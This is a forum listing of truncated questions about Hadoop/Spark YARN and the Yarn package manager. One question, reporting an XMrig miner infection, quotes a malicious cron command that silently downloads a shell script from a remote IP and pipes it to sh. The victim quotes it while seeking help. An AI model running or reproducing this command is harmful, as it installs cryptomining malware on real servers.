Questions tagged [yarn]

1

votes
0

answer
997

Views

Could not find CoarseGrainedScheduler or it has been stopped

Recently I strated working on Talend Bigdata. I have written some jobs that is getting executed properly. Data to process in every run is less than a gb but it's .gz file. Job is running succesful but I am facing the below error frequently although when reprocessing the job without any changes then...
Varun
1

votes
0

answer
41

Views

Is it normal Hadoop to be 60 times slower than local computations?

I am doing machine learning tasks on hadoop (regard forward execution) cluster with dozens of nodes. In case of dataset sizes like 10k samples per 300 features, Hadoop processing (running common models like shallow neural nets or decision trees) can take up to 6 hours. Simultaneously, the same or si...
Dims
1

votes
0

answer
47

Views

How to get the scheduler of an already finished job in Yarn Hadoop?

So I'm in this situation, where I'm modifying the mapred-site.xml and specific configuration files of different schedulers for Hadoop, and I just want to make sure that the modifications I have made to the default scheduler(FIFO), has actually taken place. How can I check the scheduler applied to a...
mani
1

votes
0

answer
293

Views

Spark jobs are not running in the specified queue

I am running spark job written in Scala. val conf = new SparkConf().setAppName('BigDataSparkInitialPoc') conf.set('spark.yarn.queue', 'Hive') val sc = new SparkContext(conf) The above code is not submitting my code into the queue called 'Hive'. Instead the job is running in the default queue I check...
TomG
1

votes
1

answer
149

Views

Possible to start Dask in yarn-client mode?

I use dask_yarn (part of knit) to start a Dask Yarn cluster as follows: import dask_yarn cluster = dask_yarn.DaskYARNCluster(env='/home/hadoop/reqs/dvss.zip', lang='en_US.UTF-8') cluster.start(n_workers=4, memory=5120, cpus=3) This requests 1 vCore on core nodes for AM, and gives the rest of the vCo...
j-bennet
1

votes
0

answer
187

Views

Spark submit a parallel job

( have a problem with Apache Spark I have a cluster with 10 nodes (1 master and 9 slaves), each node has 1048MB of memory. I work in machine learning, so I'd like to run my implementation in parallel, but I cannot make it work - there is always a single Worker that executes the application I submit....
Yacine Mohammed
1

votes
1

answer
134

Views

Container is running beyond virtual memory limits. . Killing container

Current setup mysql connector version-mysql-connector-java-5.1.13 sqoop version-sqoop-1.4.6 hadoop version-hadoop-2.7.3 java version- Jdk-8u171-linux-x64/jdk1.8.0_171(oracle JDK) OS-Ubundu Note: Also tried with openjdk , same issue exist with this version also Sqoop Command : bin/sqoop import -conne...
1

votes
1

answer
203

Views

Connecting Kerberos + SSL enabled solr in spark job under yarn

I have SOLR 6 cluster which is Kerberos and SSL enabled. When i connect to it with a test client with CloudSolrClient it works fine. But the same code when run it in spark job driver I get below check sum failed Error. I checked all the mentioned issues related checksum like reverse dns lookup and...
avinash patil
1

votes
1

answer
80

Views

Monitoring and checking status of YARN

How can I access to YARN metrics such as status of resource manager and node manager? Moreover, the same question about running yarn containers. I would like to do it via web interface.
CypherFancy
1

votes
1

answer
108

Views

Jenkins grunt compass ENOENT No such file or directory @ realpath_rec

I am working on an existing project to replace bower with yarn and upgrading angularjs from 1.2.9 to 1.3.0 I've got it working on my local system but it fails on jenkins when running deploy grunt task with a filepath issue, the weird thing is on jenkins it complains with my local path Errno::ENOENT...
Subash
1

votes
0

answer
334

Views

Please explain details for Flink on YARN

Could anybody explain me the optimal configuration and parallelism for high performance flink jobs on YARN? I use Cloudera Hadoop with 4 nodes (1 main node + 3 worker nodes) each has 12 CPU and 96 Gb memory. There are few yarn properties yarn.scheduler.maximum-allocation-mb - current value is 36Gb y...
1

votes
1

answer
168

Views

How YARN does check health of hadoop nodes in YARN web console

I would like to know how YARN Web UI running at port 8088 consolidates the Datanodes,Namenodes and other cluster components health status. For example, this is what i see when i open the Web UI. Hi guy, your all datanodes are healthy.
Ansible fancy
1

votes
0

answer
23

Views

Spark streaming : WAL ignored

I have a spark streaming application running on yarn that consumes from a jms source. I have the checkpointing and WAL enabled to ensure zero data loss. However, When I suddenly kill my application and restarts it, sometimes it recovers the data from the WAL but sometimes it doesn’t !! In all the...
Lezzar Walid
1

votes
0

answer
152

Views

Yarn is impacted with XMrig miner trojan

HDP stack yarn processor infected with XMrig trojan, even If I use the kylo ex2 sandbox, i get this trojan that take 100% of your CPU. yarn) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1) This is a cron, run by the yarn user and generated files and loads on the server tr...
Raja Marimuthu
1

votes
0

answer
135

Views

YarnAllocator requests containers more than I asked for

YarnAllocator and Yarn Resource Manager acted so generously that it requested and gave more than I put on the config. I asked for a total of 72 containers and it gave 133 containers. What I expect is that YarnAllocator will allocate only how many I asked. Can someone please explain what happened? An...
minyo
1

votes
0

answer
205

Views

Spark, with tons of memory, failing to join dataframes due to OOM

We're using Spark at work to do some batch jobs, but now that we're loading up with a larger set of data, Spark is throwing java.lang.OutOfMemory errors. We're running with Yarn as a resource manager, but in client mode. Driver memory = 64gb Driver cores = 8 Executors = 8 Executor memory = 20gb E...
CubemonkeyNYC
1

votes
2

answer
200

Views

Can't access to SparkUI though YARN

I'm building a docker image to run zeppelin or spark-shell in local against a production Hadoop cluster with YARN. I can execute execute jobs or a spark-shell well but when I try to access on Tracking URL on YARN meanwhile job is running it hangs YARN-UI for exactly 10 minutes. YARN still working an...
Pau Trepat
1

votes
1

answer
282

Views

AWS-EMR error exit code 143

I'm running an analysis on AWS EMR, and I am getting an unexpected SIGTERM error. Some background: I'm running a script that reads in many csv files I have stored on S3, and then performs an analysis. My script is schematically: analysis_script.py import pandas as pd from pyspark.sql import SQLCont...
cracka31
1

votes
0

answer
178

Views

Yarn force a package to use a specific version

I currently have the the following issue when running a unit test using the Jest Vue cli plugin found here. https://www.npmjs.com/package/@vue/cli-plugin-unit-jest Error I receive is Requires Babel '^7.0.0-0', but was loaded with '6.26.3'. If you are sure you have a compatible version of @babel/core...
matthew
1

votes
0

answer
99

Views

Flink on yarn, container's physical memory used Has been rising

When I search for the container.it shows like : yarn 38530 116969 0 Jul17 ? 00:00:00 bash /mnt/dfs/2/hadoop/yarn/local/usercache/sloth/appcache/application_1526888270443_0045/container_e12_1526888270443_0045_01_000039/default_container_executor.sh yarn 38533 38530 0 Jul17 ?...
spoon
1

votes
0

answer
99

Views

Spark shuffle error: Incorrect header or version mismatch error

I am running Spark on YARN and get a weird error when loading JSON files from HDFS. I use PySpark on a Jupyter notebook but it doesn't get to any part where data is actually collected. The following is my code: df = spark.read.option('timestampFormat', 'yyyy/MM/dd HH:mm:ss ZZ').json('hdfs://:8020//*...
Anton.P
1

votes
0

answer
677

Views

Could not find or load main class org.apache.spark.deploy.yarn.ExecutorLauncher

I have this submitted job fine in YARN mode but I get the following error I added a Spark jar installed locally, but the Spark jar can also be in a world-readable location on HDFS. This allows YARN to cache it on nodes and added .bashrc yarn_config_dir and hadoop_config_dir. ERROR: Could not find o...
Srinivas Rao M
1

votes
0

answer
22

Views

Disruptive java processes on local machine after connecting to yarn-managed spark cluster with sparklyr

I am using sparklyr to connect to a yarn-managed spark cluster that is not located on my server. I have a local installation of spark that acts as a client for the back-and-forth to the yarn cluster. PROBLEM: I'm seeing some java processes that hang around on my local server (especially when I kill...
Zafar
1

votes
1

answer
128

Views

Change tmp directory while running yarn jar command

I am running an MR job using yarn jar command and it creates a temporary jar in /tmp folder which fills up the entire disk space. I want to redirect the path of this jar to some other folder where I have more disk space. On this link, I came to know that we can change the path by setting the propert...
Charul
1

votes
0

answer
66

Views

How do I get the YARN application ID from within a Mapper?

How do I get a yarn application ID from within a mapper? It looks like I can get the CONTAINER_ID from an environment variable with the same name, and it looks like the format of the containerID is similar to the application ID, but it is not the same. Is there a better way to do this? >>> sc.applic...
vy32
1

votes
0

answer
63

Views

Spark Yarn mode is not working throws java Null Pointer exception on executors stages

My Scala program does parsing the log using Java object method called parse and it works fine in local[*] mode however it is not working neither on Cloudera yarn client mode or cluster mode. val hivehbaserows = spark.sql(' select log msg from hivehbasetable') hivehbaserows.foreach(x => { val line =...
tech questions
1

votes
1

answer
261

Views

Spark history server and clearing history

What is the best way to get away with the History Server entries. My cluster has lot many execution which show up as Application Ids. I know these are occupying significant amount of hard disk space in HDFS file system (i am assuming). Actually, the heap memory usage of History server is continuing...
Prashant A
1

votes
0

answer
84

Views

MapReduce job is not running on a HADOOP 2.6.0 (Multi node cluster)

I have done Hadoop 2.6.0 Multi node cluster setup successfully on 4 machines(1 master and 3 slaves). But when I'm trying to run a simple word count job on cluster it gets stuck. It's stuck here: :~$ hadoop jar ~/MY_MAP_JARS/wordcount_f2.jar /input/crime /output/cc1 18/07/31 02:25:04 INFO client.RMPr...
ArunTnp
1

votes
0

answer
102

Views

Fair Scheduler without preemption on YARN

I have the following FairScheduler configuration for a M/R job on EMR 5.16.0 (Hadoop 2.8.3): queue1 - weight 1.0 queue2 - weight 3.0 This 2 queues are under root queue. I start an application app1 on queue1 and given the fact there is nothing else running, the application will take 100% of the EMR c...
LaviniaS
1

votes
1

answer
153

Views

spark - application returns different results based on different executor memory?

I am noticing some peculiar behaviour, i have spark job which reads the data and does some grouping ordering and join and creates an output file. The issue is when I run the same job on yarn with memory more than what the environment has eg the cluster has 50 GB and i submit spark-submit with close...
user1122
1

votes
0

answer
148

Views

How to aggregate custom application logs in Spark on HDInsight?

CONTEXT I want to configure custom logging in an application written in python and running on a HDInsight Spark cluster (hence Hortonworks-style). HDInsight cluster type: Spark 2.2 on Linux (HDI 3.6), Spark version: 2.2.0.2.6.3.2-13 My requirements are as follows: logging to a file aggregating l...
Dominik
1

votes
1

answer
38

Views

PIG - SET yarn garbage collection

I am trying to set following properties in a Pig script: mapreduce.reduce.java.opts='-Xmx6114m -XX:+UseG1GC -verbose:gc -XX:+PrintGC -XX:+PrintGCDateStamps' yarn.app.mapreduce.am.command-opts='-Xmx6114m -XX:+UseG1GC -verbose:gc -XX:+PrintGC -XX:+PrintGCDateStamps' As SET mapreduce.reduce.java.opt...
Freeman
1

votes
1

answer
159

Views

Some YARN worker node not join cluster , while I create spark cluster on Dataproc

I have created a spark cluster on dataproc with 1 master and 6 worker node. On GCP console I can see 6 VMs are running, but I only see 5 nodes on YARN Node Manager UI. When I ssh into that machine, from the yarn-yarn-nodemanager log, I see, it keeps restarting and reconnecting to NodeManager. How ca...
howie
1

votes
1

answer
174

Views

Spark/Yarn: FileNotFoundException

I am runnig the following code in spark. scala>import com.databricks.spark.xml.XmlInputFormat scala>import org.apache.hadoop.io._ scala>sc.hadoopConfiguration.set(XmlInputFormat.START_TAG_KEY,'') scala>sc.hadoopConfiguration.set(XmlInputFormat.END_TAG_KEY,'') scala>sc.hadoopConfiguration.set(XmlInp...
HSP
1

votes
0

answer
128

Views

Spark failure detection - why datanode not send heartbeat to the master machine ( driver )

as all know the heartbeat is a signal sent periodically in order to indicate normal operation of the node or synchronize with other parts of the system in our system we have 5 workers machine , while executes run on 3 of them our system include 5 datanodes machines ( workers ) , and 3 master machine...
Judy
1

votes
0

answer
222

Views

Spark application cannot run successfully on EMR with YARN

My spark application run perfectly on client mode with master local[*] on EMR and yarn mode too locally Spark submit command: spark-submit --deploy-mode cluster --master yarn \ --num-executors 3 --executor-cores 1 --executor-memory 2G \ --conf spark.driver.memory=4G --class my.APP \ --packages org.a...
tom10271
1

votes
0

answer
37

Views

Unable to connect to YARN webapp UI in CDH 5.11.2

This CDH cluster has been install for months, and be used to backup logs. Today I try to run flink on yarn, and want to open yarn web ui to check flink taskmanagers' state, i find 8088 port connect refuse. ``` This site can’t be reached 47.74.***.*** refused to connect. Search Google for *** ***...
user1978965
1

votes
0

answer
88

Views

Spark Fixed Width File Import Large number of columns causing high Execution time

I am getting the fixed width .txt source file from which I need to extract the 20K columns. As lack of libraries to process fixed width files using spark, I have developed the code which extracts the fields from fixed width text files. Code read the text file as RDD with sparkContext.textFile('ab...
Katty
1

votes
0

answer
43

Views

Pig on mapreduce mode is stuck on dumping hdfs data in Hortonworks HDP

I have some data files in my Hortonworks HDFS location. My requirement is to dump HDFS data in pig shell using pig-mapreduce mode. After loading the file data from HDFS, when trying to dump the data in pig shell using DUMP command, the map reduce job is getting stuck at 0% and not completing the job...
sandip
1

votes
0

answer
111

Views

Execute hive query cause yarn resource manager to throw file does not exist exception

I'm configuring hive 3.1.0 to work with hadoop 3.0.0. This error throw almost immediately when I submit a simple query on beeline that cause map reduce 0: jdbc:hive2://> select count(*) from airlinedata; 18/10/11 10:24:45 [HiveServer2-Background-Pool: Thread-124]: WARN ql.Driver: Hive-on-MR is depre...
mtu

View additional questions